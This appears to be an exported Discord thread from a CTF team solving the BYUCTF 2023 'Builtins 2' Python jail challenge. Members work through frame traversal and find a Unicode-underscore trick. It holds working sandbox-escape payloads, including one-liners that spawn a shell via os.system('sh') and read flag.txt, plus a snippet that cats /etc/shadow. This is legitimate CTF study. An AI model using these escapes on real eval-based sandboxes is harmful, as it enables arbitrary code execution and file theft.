Project Sekai - 🩸-jail-builtins-2

Project Sekai

🔒 BYUCTF 2023 / 🩸-jail-builtins-2

Builtins 2 - 500 points

Category: Jail Description: But wait it's different this time... Per usual, the flag is stored in ./flag.txt nc byuctf.xyz 40006 Files:

https://cyberjousting.com/files/e04a547caa8e856c09df3ae33977aaea/b2.py?token=eyJ1c2VyX2lkIjoyMjAsInRlYW1faWQiOjkxLCJmaWxlX2lkIjozN30.ZGerQQ.ueTVkBKYQUSpojW_EuCTjKsK6XU

Tags: Hard

Sutx pinned a message to this channel. 05/19/2023 10:00 AM

@Violin wants to collaborate

@Legoclones wants to collaborate

@unpickled admin bot wants to collaborate

:< this is much harder lmao

hmm if i can get an import this should be easier

12:45

but idt you can eval imports

12:45

aaaaa

12:46

hmm either this chall needs a getattr, or someway around the restriction

12:46

thats all my ideas for now lol

12:46

hmmmm

12:46

(ok i gtg )

@TheBadGod wants to collaborate

HI!!

AES_DeepFakeAstolfoWave

might be generator shenanigans

13:33

something like (print:=(1 for _ in []))and(print.throw)

TheBadGod

something like (print:=(1 for _ in []))and(print.throw)

what about them?

13:37

ive never used generators in a pyjail :<

they have some extra frames

oh (edited)

but currently can't figure out how to traverse up

like traceback frames?

TheBadGod

but currently can't figure out how to traverse up

can you send the "ideal" path up? like if you had __s?

idk, never used it before lol

ohh

13:38

~~is this smthng robin did once lmao~~

13:39

@TheBadGod we can get a traceback with this

with throw yes

problem is we would need __traceback__ to traverse up from there i think

13:39

didnt coldwind do this in his blog?

13:40

also we dont have Exception to throw i think?

yeah we have nothing lol

tr.__traceback__.tb_frame.f_back.f_globals["__builtins__"]

13:40

btw how to traverse up from a traceback

13:40

but idt itll work here

13:40

you can def drop the __builtins__ but

no f_back on gi_frame is None

gi_frame? (edited)

13:41

and it depends

13:41

you need to trigger a frame switch i think

13:42

actually wait can you even call stuff on that

13:43

because i think you would need a try/except (edited)

13:43

but idt you can do a 1 line try/except

13:48

@TheBadGod

13:49

can we replace bytecode

13:49

print.gi_code.replace()

already tried that, got NameError: name 'co_code' is not defined

ah

but maybe i was just dumb, lemme see again

im prob being dumb lmao but

13:50

oh wait ye

13:50

replace(*, co_argcount=-1, co_posonlyargcount=-1, co_kwonlyargcount=-1, co_nlocals=-1, co_stacksize=-1, co_flags=-1, co_firstlineno=-1, co_code=None, co_consts=None, co_names=None, co_varnames=None, co_freevars=None, co_cellvars=None, co_filename=None, co_name=None, co_qualname=None, co_linetable=None, co_exceptiontable=None) method of builtins.code instance
    Return a copy of the code object with new values for the specified fields.
(END)

13:50

no co_code in there

13:50

we cant mess with that

13:50

:aaaaa:

yes it is

oh

13:50

wait

13:50

im blind ig

i tried it as a string (as in two args) (edited)

isnt it supposed to be bytes?

no named arg

13:50

ah yes the thing itself is a bytes object

TheBadGod

no named arg

for the function?

13:51

then cant you just breakpoint()

13:51

that doesnt need an arg?

13:51

sry if im being dumb lol

no, the .replace needs a named argument, i tried to do like a string, so "replace('co_code', b'asdasd')) which does not work

13:52

nowhere close to breakpoint I think

oh

13:53

isnt it supposed to be replace(co_code=b'asdasd')

yes

13:53

that's what I'm saying i did wrong

even then idt it matters in retrospect

13:54

because

13:54

.replace will return a code object

13:54

and we cant assign i think?

13:54

because <some func to nuke code of>.__code__ = <our code> needs dunders :< (edited)

@TheBadGod got builtins

14:02

(print:=(1 for _ in []))and(print.gi_frame.f_back.f_back.f_builtins)

14:02

i think

14:02

works locally

mmh, doesn't work for me in python 3.11

hmm wait lemme check

14:04

@TheBadGod ?

Image attachment

tried on the remote and only got AttributeError: 'NoneType' object has no attribute 'f_back'

wtf

Image attachment

14:05

ye

Builtins 2 has the same Python version as Builtins 1 (same container)

1

14:05

so python 3.12

3.12s a thing now

14:06

gotta update lol

14:10

damn is lego just watching with popcorn

~~just saw his react~~ (edited)

absolutely

wtf 3.12 isnt on brew

14:11

:sadge:

If we could update the co_filename and then crash (e.g 1/0 inside the generator) we could get a traceback

unpickled admin bot

wtf 3.12 isnt on brew

it's the dev branch basically

i have idle but

14:12

idle is extremely cringe

14:12

like unbelievable levels of bad ui

TheBadGod

If we could update the co_filename and then crash (e.g 1/0 inside the generator) we could get a traceback

sadly it's a string, so immutable, and well... updating it will also clone the code object

and we cant reassign those :<

yeah

oh lmao idles an app and it has the python binary

14:13

thats nice

14:18

owait

Image attachment

14:19

what does it meaaaan

14:19

aaaaaa

14:21

https://stackoverflow.com/questions/41239455/why-are-python-generator-frames-gi-frame-f-back-attribute-always-none o stackoverflow carry

Why are python generator frames' (gi_frame) f_back attribute always...

The title is pretty self-explanatory. I'm doing something like: gen = obj #some generator instance running frame = obj.gi_frame prevframe = frame.f_back But I always get None for prevframe. Why i...

14:21

anyways no f_back to navigate back frames from generator frames :sad:

14:23

problem with traceback frames is

14:24

if we did smthng like

try: 
  "legoclonesiswatching"/2
except Exception as e:
  tr = e.__traceback__

1

14:24

(we need __s for traceback?)

plus we need except which im pretty sure won't work in eval

ye (edited)

14:24

no 1 line on try/except

unpickled admin bot

owait

anyways it seems they nuke their parent frame ref

https://stackoverflow.com/questions/60420670/methods-in-a-generator-expression-gi-running-gi-yieldfrom-etc

Methods in a generator expression: gi_running, gi_yieldfrom, etc

I have created the following generator function:

def file_readlines(filepath): ... f = open(filepath, 'r') ... for line in f: ... yield line ...

gen=

TheBadGod

https://stackoverflow.com/questions/60420670/methods-in-a-generator-expression-gi-running-gi-yieldfrom-etc

are you thinking about gi_yieldfrom?

doesn't help but fun thing

oh okk

14:26

print.gi_yieldfrom also none :sad:

14:26

alr cancelling my evening plans

AttributeError: attribute 'gi_yieldfrom' of 'generator' objects is not writable

its not even not writeable

not writable anyway

its just None

14:27

oh

14:27

ye

https://sekai.team/blog/lactf-2023/pycjail/

LA CTF 2023 – Pycjail

Use bytecode manipulation to subvert jail restrictions.

14:31

CB_thonk_overload

TheBadGod

https://sekai.team/blog/lactf-2023/pycjail/

what about it?

idk sounds similar to our earlier plan lol

14:32

we just need a way to get the code object to run

Calling locals() inside a comprehension now includes variables from outside the comprehension, and no longer includes the synthetic .0 variable for the comprehension "argument".

doesnt seem useful but also coool

TheBadGod

https://sekai.team/blog/lactf-2023/pycjail/

~~are you going the osint-the-author route?~~ (edited)

1

_co_code_adaptive

14:41

what is that

i checked that, didnt seem ultra useful unless i was wrong

14:41

i ran help on it lol

14:41

wait nvm

14:41

wrong thing

14:41

idk

14:42

adaptive is described under CACHE documentation:

Rather than being an actual instruction, this opcode is used to mark extra space for the interpreter to cache useful data directly in the bytecode itself. It is automatically hidden by all dis utilities, but can be viewed with show_caches=True.

Logically, this space is part of the preceding instruction. Many opcodes expect to be followed by an exact number of caches, and will instruct the interpreter to skip over them at runtime.

Populated caches can look like arbitrary instructions, so great care should be taken when reading or modifying raw, adaptive bytecode containing quickened data.

New in version 3.11.

dis describes this as adaptive

14:43

and then dis will use the adaptive co_code if well adaptive is passed

14:43

https://peps.python.org/pep-0659/ or this

PEP 659 – Specializing Adaptive Interpreter | peps.python.org

Python Enhancement Proposals (PEPs)

yeah also found some stuff

wait is it writeable

??

no

:<

14:47

@Legoclones please add the self-loathing tag to this chall

Image attachment

14:47

tyty

lol okay

14:48

done

tyty

14:48

much more accurate

1

14:48

(is fun tho) (edited)

1

good!! I'm glad

:< tfw not python 3.11

@TheBadGod are you still using generators?

looking around in other objects

ye aight i was considering doing the same

async generators are basically the same as generators, so not too interesting either

wait how did you make an async gen?

(await 1for i in [1]) lol

oh

15:21

uhhhhhh

15:22

lets not talk about that lmfao

yeah

~~tfw im desperate enough im poking around a set lmao~~

lmao what

Image attachment

lost sys.stderr?? (edited)

15:34

also unrelated damn whats that program

(edited)

15:34

or is it custom

custom

15:35

i mean it's just a bit recursion

15:35

objs=[(await 1 for i in [])]

def recurse(o,depth=0):
    print(o)
    print(type(o))
    if type(o) == int: return
    if type(o) == bool: return
    if type(o) == str: return
    if type(o) == bytes: return
    if type(o) == float: return

    if depth > 10:
        return
    keys = set(dir(o))
    keys = set(dir(type(o)))
    if hasattr(o, "keys"):
        try:
            keys |= o.keys()
        except:
            pass
    for n in filter(lambda x: "__" not in x, keys):
        print("  "*depth,end="--> ")
        print(n, end=" ")
        try:
            if n in o:
                recurse(o[n])
            else:
                recurse(getattr(o,n),depth+1)
        except:
            recurse(getattr(o,n),depth+1)


for o in objs:
    recurse(o)

tyty

maybe remove the print(o) to remove some clutter

i feel like the solve is smthng with stack frames like your gen frames (edited)

15:36

but idt its generator

15:36

just because (edited)

15:37

you literally cant traverse back i think?

15:37

it seems f_back is always none

15:37

if it isnt None maybe its doable but

15:37

(legoclone 100% eating so much popcorn rn)

1

going back for thirds on that popcorn bruh

:<

while verifying bad2 in the background

builtins 2 hint drop wen :<

15:38

/j we got this

We may drop hints on unsolved challs like 6-8 hours before the comp ends

15:38

so in a while

Legoclones

while verifying bad2 in the background

saw that there is more in the code object, but it was never loaded (and python3.9 and python3.10 have different behaviour in loading it lol)

1

TheBadGod

saw that there is more in the code object, but it was never loaded (and python3.9 and python3.10 have different behaviour in loading it lol)

isnt the jail on .12?

15:40

a working solve on .11 is just spamming f_back

different challenge

oh

15:41

ooooh rev

15:41

you got this

15:42

Well, my power has doubled since the last time we met!!

but what if he had no power to begin with

1

Yeah i disassembled the code as

# will never be true because get_output has a newline at the end?
if output[-4:] == "root": 
    output += "$ cat /etc/shadow\n"
    output += get_output("$ cat /etc/shadow")
else:
    output += "$ cat /etc/passwd\n"
    # why no "$" here?
    output += get_output("cat /etc/passwd")

(output is actually a lookup into a dict, so mutable outside the code object), but there seem to be some more co_consts (namely \u202eXOR and nuivyg)

$ ?

15:43

smh inconsistent formating clones :<

yeah

15:43

Image attachment

15:46

in python3.11 the code object does not even load because the constructor was changed and in python3.9 the jump to 60 is a jump to 30, meaning it would jump to the wrong offset

@snwo wants to collaborate

@strellic wants to collaborate

@jayden wants to collaborate

ohi

19:32

hmm is lego still watching

1

19:33

bro what

19:33

:aaaa: he is

1

19:33

1984

my eyes have been glued to discord for 9.5 hours

are you ok

getting a little bored

blink twice if you need help

1

but some friends just came so we need something to do

Hmm what if generator stack frames was just a rabbit hole

unpickled admin bot

a working solve on .11 is just spamming f_back

Lego for noooooo reason can you move the jail to 3.11

1

19:55

(Joke)

u can do it

https://docs.python.org/3.12/reference/datamodel.html#types currently just looking through this

Objects, values and types: Objects are Python’s abstraction for data. All data in a Python program is represented by objects or by relations between objects. (In a sense, and in conformance to Von ...

TheBadGod

we just need a way to get the code object to run

Not sure if youre awake but

20:06

Special writable attributes: f_trace, if not None, is a function called for various events during code execution (this is used by the debugger). Normally an event is triggered for each new source line - this can be disabled by setting f_trace_lines to False.

20:06

For gi_frame

20:07

If you have an actual code object we might be able to run it there

20:07

I dont know when that is run though

20:08

(Cant test on phone and cant find 3.12 online lmao)

20:09

All gi_frames writeable attributes: Special writable attributes: f_trace, if not None, is a function called for various events during code execution (this is used by the debugger). Normally an event is triggered for each new source line - this can be disabled by setting f_trace_lines to False. Implementations may allow per-opcode events to be requested by setting f_trace_opcodes to True. Note that this may lead to undefined interpreter behaviour if exceptions raised by the trace function escape to the function being traced. f_lineno is the current line number of the frame — writing to this from within a trace function jumps to the given line (only for the bottom-most frame). A debugger can implement a Jump command (aka Set Next Statement) by writing to f_lineno

ah ok so this is weird but it def wont work

20:40

because while that is supposed to be called, it seems to mandate a global trace function before it even tried running the local one (?) (edited)

20:40

weird idk

20:40

and since obv we dont have sys to mess with the current frame

(edited)

20:41

legoclones how much popcorn have you consumed so far lmao (edited)

i'm full of popcorn

ok def cant be using a function

21:03

literally everything is dunders on functions/async functions

hmmmm so rn im looking for ways to make f_back exist because if it was always None it wouldnt exist..... right........?

(the answer is it is always in fact None)

21:37

because generators use coroutines and if coroutines had parent frames python would fare worse than my computer (edited)

21:38

smh why does the attrib even exist then :<

update: avdufbhjvwre9cofhuigbwrifpcohubihrewcouihjvjoiwuibhgohuibghuivghihubgohijhohhjoijhvgiasduciasklckadshvbajdfs vjkaackdscashuvghiuhhgihiuhhjhdcsafedsiucuhegvklhfukcwehiuywreblfuhcjwhdhuyhvgfuih a jna.asb∆˚åˆ´¨år˚ƒ∆ß∂ˆ√¨ß∆√˜˚åß* (translated to coherent english, i think its stackframes but also you cant get those without sys, generators, or tbs, but generator f_backs are None, no sys, and we cant get a tb object cuz no 1 line try/except (and cant even catch cuz except Exception as e needs Exception))

22:19

@Legoclones are you sorry about this one (edited)

Image attachment

unpickled admin bot

@Legoclones are you sorry about this one (edited)

No, I'm kinda proud of it but you'll probably hate me afterwards

Legoclones

No, I'm kinda proud of it but you'll probably hate me afterwards

if its an interesting python concept ill love it dw

I've said this to others, it's a trick I haven't seen anyone use before

22:24

idk if anyone else knows about it

22:24

a Legoclones special

22:26

damn so maybe i should stop reading my pyjail.md

22:26

not even generator frames

(edited)

Legoclones

I've said this to others, it's a trick I haven't seen anyone use before

is there anything else perhaps you have said to others

for noooo reason at all

22:32

i should stop hyperfocusing stackframes

unpickled admin bot

is there anything else perhaps you have said to others

for noooo reason at all

No, I don't think I said anything else

22:36

also no one's really asked about it

hmmmmmmmmmmm

TheBadGod

objs=[(await 1 for i in [])]

def recurse(o,depth=0):
    print(o)
    print(type(o))
    if type(o) == int: return
    if type(o) == bool: return
    if type(o) == str: return
    if type(o) == bytes: return
    if type(o) == float: return

    if depth > 10:
        return
    keys = set(dir(o))
    keys = set(dir(type(o)))
    if hasattr(o, "keys"):
        try:
            keys |= o.keys()
        except:
            pass
    for n in filter(lambda x: "__" not in x, keys):
        print("  "*depth,end="--> ")
        print(n, end=" ")
        try:
            if n in o:
                recurse(o[n])
            else:
                recurse(getattr(o,n),depth+1)
        except:
            recurse(getattr(o,n),depth+1)


for o in objs:
    recurse(o)

i can rule out traceback frames i think, just used this

23:00

also just realised how useful that function is (edited)

23:04

Last but not least, we have three exception fields (f_exc_type, f_exc_value and f_exc_traceback), which are rather particular to generators

i found this on a shady corner of the internet (edited)

23:05

for code objects

23:05

¯\_(ツ)_/¯

(but idt we can do anything with an tb object) (edited)

@4n0nym4u5 wants to collaborate

Hi!

im here only to see

23:59

Been steadily entering the ctf mindset

Image attachment

msfrog

2

Cant put a comment on a new line so def no way to do like utf-7 (edited)

unpickled admin bot

Last but not least, we have three exception fields (f_exc_type, f_exc_value and f_exc_traceback), which are rather particular to generators

i found this on a shady corner of the internet (edited)

googled it, only found python 2 references to those things (they would be in the frame object, so would actually be interesting in our case)

00:34

but yeah, they don't exist in the frame objects we have, so pikashrugA

pikashrugA

unpickled admin bot

Been steadily entering the ctf mindset

lol not bad, i spent whole night on some foren/rev and everything was halfway yet far away

omfg

02:55

_＿

02:55

Image attachment

02:56

yeah ok

TheBadGod

used /ctf submit

Well done, you got first blood!

byuctf{unicode_is_always_the_solution...}

03:04

{}._＿class_＿._＿base_＿._＿subclasses_＿()[-6]("","",["flag.txt"],["."])

06:30

lol interesting, the trick is similar to the italize one using unicode?

yeah, i mean i tried that

06:32

but it only works if the first underscore is a normal one

also works on other python ver.?

yes

ic

BRO YOU FRICKIN GOT IT

09:47

Tbg is absolute beast

TheBadGod

Click to see attachment 🖼️

Wrf

12:29

What character

12:29

Is that

12:29

What

＿

unicode underscore

oh

12:30

12:30

Bro i was over here like

12:30

Doing fback

12:30

Then this

just like how python recognizes italic text as normal, unicode underscore as regular underscore but only when not by itself

from unicodedata import normalize

for i in range(0x110000):
    if "_" in normalize("NFKC", chr(i)):
        print(chr(i))

Legoclones

just like how python recognizes italic text as normal, unicode underscore as regular underscore but only when not by itself

~~i tried 2 of em…~~

12:30

I think

12:31

Or maybe not unicode underscores

unpickled admin bot

~~i tried 2 of em…~~

yeah if you use them by themselves you get an invalid character error

or as first char

12:31

it has to specifically be not the first

crazy that you got it

12:31

tbg always wins i guess

but any of these should be underscores:

︳
︴
﹍
﹎
﹏
＿

Wtf are the first ones

Legoclones

crazy that you got it

was just playing around with that underscore and suddenly got a name is not defined and was like what

1

unpickled admin bot

Wtf are the first ones

underscores obviously kekw

kekw

Uhhh

12:32

Image attachment

12:32

Hmmmm

https://www.compart.com/en/unicode/U+FE33

Find all Unicode Characters from Hieroglyphs to Dingbats – Unicode ...

U+FE33 is the unicode hex value of the character Presentation Form For Vertical Low Line. Char U+FE33, Encodings, HTML Entitys:︳,︳, UTF-8 (hex), UTF-16 (hex), UTF-32 (hex)

LOL

12:32

weird symbol

python says it's an underscore

peepoo

2

Based on "_" (U+005F)

12:33

Oh

12:33

:aaaa: i feel dumb now

12:33

Ggs

also my exploit is 66 chars (and 78 bytes)

unpickled admin bot

:aaaa: i feel dumb now

same when I figured out that the order matters

TheBadGod

also my exploit is 66 chars (and 78 bytes)

so 6 chars to spare

nice

TheBadGod

same when I figured out that the order matters

Why tho

12:34

Why does it matter??

i have no idea whatsoever

Lmaoo

TheBadGod

https://www.compart.com/en/unicode/U+FE33

Is it just that python takes the characters its ‘based’ on?

12:38

Thats cool

yeah python basically calls the normalize function on all identifiers

12:39

but I guess if it starts with a weird char it's invalid?

TheBadGod

yeah python basically calls the normalize function on all identifiers

Other weird thing tho

12:41

If you like italicize p

12:42

And pass it

12:42

It should show as p in the == iirc (edited)

12:42

But not this?

12:42

Unless my brain has melted too much

wdym?

12:42

if you use an italized p in an identifier then it get normalized to a p

I've been doing a lot of trial and error, testing out Python unicode stuff like this

12:43

Trying to figure out how it works

or something like ₚ gets normalized to p as well

That's how I stumbled upon the unicode underscore thing too

12:44

I'm probably gonna publish an extended blog post about Python + unicode, with jail applicability

12:44

you'll read about more weird Python unicode quirks

12:44

like a string with unicode inside ISN'T automatically transformed in Python

12:44

HOWEVER

12:45

if you do int('𑱖') it gives you 6

12:45

since it's 6 in some random language I think

12:45

normalizes to that

12:45

so in specific situations, it doesn't care

Legoclones

if you do int('𑱖') it gives you 6

you'll see this in bad2

TheBadGod

but any of these should be underscores:

︳
︴
﹍
﹎
﹏
＿

how did you find these?

12:46

just experimenting with this stuff now ~~must learn~~

TheBadGod

from unicodedata import normalize

for i in range(0x110000):
    if "_" in normalize("NFKC", chr(i)):
        print(chr(i))

^

oh

12:47

uh

12:47

uhh

12:47

tyty

1

12:47

ok but serious question time

12:47

︳

12:47

how is that an underscore

12:47

like (edited)

12:47

in what universe

Image attachment

12:47

no idea

pikashrugA

12:49

also fun fact: some unicode chars are 2 chars, so something like __ﬁle__ would give you the same as __file__ but using one character less... but like two more bytes

TheBadGod

also fun fact: some unicode chars are 2 chars, so something like __ﬁle__ would give you the same as __file__ but using one character less... but like two more bytes

wait ﬁ normalises to 2 letters? (edited)

12:49

what the

12:50

tbg orz

(edited)

I think there was once a ctf challenge where you had to print the flag using three chars, so you could use ﬂ for fl and then fill up using ag

ok wait my brain is frying slightly less (edited)

yeah it's ﬁ vs ﬂ

ye got confused lol (edited)

Legoclones

Tbg is absolute beast

he is

12:57

op (edited)

TheBadGod

also fun fact: some unicode chars are 2 chars, so something like __ﬁle__ would give you the same as __file__ but using one character less... but like two more bytes

crazy

btw @Legoclones just wanna say (f:=(1 for _ in []))and(f.gi_frame.f_back.f_back.f_globals["_""_loader""_""_"].load_module("os").system("sh")) 3.11 is a much happier place

1

22:15

(way above 72 but golf later)

you should put that in sekaictf

LOL

23:06

add some ban words and unicode ban then

23:06

lmao

hmmm given the fact tbg sees this

23:07

wait is tbg a dev for sekaictf?

23:07

or does he compete

no he will prob help to playtest at least

also pepsi knows

yeah jk, we can think of sth else if needed lol

23:08

there was some discussion in prep channel but well, noone has idea yet

Okay now that BYUCTF is done I can help sekaictf more

23:34

Can finally think

1

@Legoclones

23:43

its doable

23:43

without normalization

23:43

(but cant get under 72 chars)

23:43

23:44

inp = input("code> ")
if "__" in inp or any(ord(c)>0x7f for c in inp):
    print("Nope")
else:
    print(eval(inp, {"__builtins__": {}}, {"__builtins__": {}}))

(edited)

23:45

this is doable!!

mmh, none of the python versions I had installed worked with the payload you sent earlier

23:47

f_back is always None, even in older versions

oh hey i can type again

23:52

[*([x.append((x[0].gi_frame.f_back.f_back.f_globals for _ in[1])) or x[0]for x in[[]]][0])][0]['_''_builtins_''_'] self ref makes a generator that is executing, which means f_back is preserved and you can use it to get globals (edited)

23:54

[*([x.append((x[0].gi_frame.f_back.f_back.f_builtins for _ in[1])) or x[0]for x in[[]]][0])][0] ok the golf begins

23:54

ngl i think this might be a bit of a lost cause here

23:55

not exactly the shortest

Image attachment

23:58

(osinted payload) (edited)

23:58

https://nedbatchelder.com/blog/201206/eval_really_is_dangerous.html

Eval really is dangerous

eval() is tempting, but it’s truly dangerous. Here’s how common safety attempts can be circumvented.

nice article

00:06

this guy has some interesting topic articles to read

unpickled admin bot

[*([x.append((x[0].gi_frame.f_back.f_back.f_builtins for _ in[1])) or x[0]for x in[[]]][0])][0] ok the golf begins

a bit easier to understand whats going on: (and somehow shorter lol) (x:=[])or(a:=(a.gi_frame.f_back.f_back.f_builtins for a in x))and(x.append(a))or[*a][0]

got the builtins in less than 80 chars: [x:=[],a:=(a.gi_frame.f_back.f_back.f_builtins for a in x),x.append(a),*a][-1]

00:38

[x:=[],x.append(a:=(b.gi_frame.f_back.f_back.f_builtins for b in x)),*a][-1]

payload to read a file: [*[x:=[],x.append(a:=(b.gi_frame.f_back.f_back.f_builtins for b in x)),*a][2]['open']('flag.txt')] or for a shell I guess [x:=[],x.append(a:=(b.gi_frame.f_back.f_back.f_builtins for b in x)),*a][2]['_''_import_''_']('os').system('sh')

Hmm yeah I still think this is great idea and you guys should use

unpickled admin bot

also pepsi knows

Who's pepsi

some dice player, but it shouldnt matter if quasar can make sth good out of it

wait are we actually making this a pyjail orr was that a joke (edited)

i have no idea msfrog

msfrog

12:23

is that sth past ctfs have made?

12:23

if osint payload then prob not lmao

ye it is p much osint lmao (edited)

Exported 435 message(s)